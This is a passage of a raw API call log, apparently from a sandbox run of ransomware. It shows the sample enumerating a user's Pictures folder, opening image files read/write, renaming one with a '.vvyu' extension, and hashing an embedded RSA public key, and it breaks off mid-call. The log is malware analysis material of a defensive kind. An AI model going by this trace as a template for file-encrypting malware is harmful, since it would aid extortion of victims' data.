[0190.559] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.559] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.559] CloseHandle (hObject=0x584) returned 1 [0190.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0190.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0190.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0190.562] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\DvPtakSDSqUBk1s-p5E_.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\dvptaksdsqubk1s-p5e_.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\DvPtakSDSqUBk1s-p5E_.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\dvptaksdsqubk1s-p5e_.jpg.vvyu")) returned 1 [0190.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.563] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0190.575] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b5e3f0, ftCreationTime.dwHighDateTime=0x1d89df2, ftLastAccessTime.dwLowDateTime=0x8fd01ca0, ftLastAccessTime.dwHighDateTime=0x1d8a496, ftLastWriteTime.dwLowDateTime=0x8fd01ca0, ftLastWriteTime.dwHighDateTime=0x1d8a496, nFileSizeHigh=0x0, nFileSizeLow=0x690a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f83rpj3sXX29oJ.jpg", cAlternateFileName="F83RPJ~1.JPG")) returned 1 [0190.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af32b8 [0190.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af32b8 | out: hHeap=0x2c0000) returned 1 [0190.576] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\f83rpj3sXX29oJ.jpg") returned=".jpg" [0190.576] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\f83rpj3sXX29oJ.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\f83rpj3sxx29oj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.576] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=26890) returned 1 [0190.576] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.579] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x68e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.580] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.582] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.582] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x690a, lpOverlapped=0x0) returned 1 [0190.583] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.583] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.583] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.583] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.584] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.584] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.584] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.584] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.584] GetLastError () returned 0x0 [0190.584] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.585] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.585] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.585] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.585] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6910) returned 0x2af5168 [0190.585] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af32b8 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3300 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.587] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ff348 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.591] GetCurrentThreadId () returned 0x5d8 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5028 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.592] GetCurrentThreadId () returned 0x5d8 [0190.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ff348 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f18 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3300 | out: hHeap=0x2c0000) returned 1 [0190.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.604] HeapFree (in: hHeap=0x2c0000, 